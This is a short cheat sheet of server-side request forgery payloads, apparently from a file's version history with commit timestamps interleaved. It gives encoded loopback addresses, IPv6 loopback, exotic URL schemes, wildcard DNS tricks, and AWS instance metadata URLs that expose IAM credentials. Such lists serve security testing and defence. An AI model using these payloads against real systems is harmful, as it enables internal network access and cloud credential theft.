2017-07-14 13:54:44 +00:00
## SSRF
```
http://0177.1/
```
```
http://0x7f.1/
```
2017-11-20 13:08:52 +00:00
```
http://127.000.000.1
```
2017-07-14 13:54:44 +00:00
```
https://520968996
```
_Note:_ The latter can be calculated using http://www.subnetmask.info/
**Exotic Handlers**
```
gopher://, dict://, php://, jar://, tftp://
```
**IPv6**
```
http://[::1]
```
```
http://[::]
2017-07-17 09:37:38 +00:00
```
**Wildcard DNS**
```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```
2017-07-17 09:39:57 +00:00
_Link:_ http://xip.io
2017-07-17 09:37:38 +00:00
```
2017-07-22 18:19:51 +00:00
10.0.0.1.nip.io
2017-07-17 09:37:38 +00:00
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```
2017-07-17 09:39:57 +00:00
_Link:_ http://nip.io
2017-08-16 07:45:37 +00:00
**AWS EC2 Metadata**
```
http://169.254.169.254/latest/meta-data/
```
```
http://169.254.169.254/latest/meta-data/local-hostname
```
```
http://169.254.169.254/latest/meta-data/public-hostname
```
> If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]
_Link:_ http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)